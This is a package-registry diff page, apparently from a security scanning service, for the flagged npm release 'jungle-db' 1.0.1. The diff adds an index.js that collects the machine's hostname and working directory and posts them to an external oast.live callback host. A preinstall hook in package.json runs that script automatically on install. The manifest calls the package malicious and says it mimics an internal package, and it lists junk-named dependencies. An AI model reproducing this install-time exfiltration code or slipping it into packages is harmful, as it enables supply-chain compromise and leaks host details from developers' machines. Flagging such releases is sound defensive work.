jungle-db 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of jungle-db might be problematic. Click here for more details.
- package/index.js +23 -0
- package/package.json +17 -0
package/index.js
ADDED
@@ -0,0 +1,23 @@
|
|
1
|
+
const os = require('os');
|
2
|
+
const path = require('path');
|
3
|
+
const axios = require('axios');
|
4
|
+
|
5
|
+
const PACKAGE_NAME = "jungle-db";
|
6
|
+
const HOSTNAME = os.hostname();
|
7
|
+
const CURRENT_PATH = process.cwd();
|
8
|
+
|
9
|
+
const url = "https://cs8hagf97nlrptqllrag5wjkxdteb97mu.oast.live";
|
10
|
+
|
11
|
+
const data = {
|
12
|
+
package_name: PACKAGE_NAME,
|
13
|
+
hostname: HOSTNAME,
|
14
|
+
current_path: CURRENT_PATH
|
15
|
+
};
|
16
|
+
|
17
|
+
axios.post(url, data)
|
18
|
+
.then(response => {
|
19
|
+
console.log('Response:', response.data);
|
20
|
+
})
|
21
|
+
.catch(error => {
|
22
|
+
console.error('Error:', error);
|
23
|
+
});
|
package/package.json
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
{
|
2
|
+
"name": "jungle-db",
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "Malicious package mimicking internal electron-panel-window",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"start": "node index.js",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"dependencies": {
|
11
|
+
"axios": "^0.21.1",
|
12
|
+
"gerhtregefddfsr": "^1.0.1",
|
13
|
+
"yogergerherhme": "^1.0.1"
|
14
|
+
},
|
15
|
+
"author": "Malicious Actor",
|
16
|
+
"license": "ISC"
|
17
|
+
}
|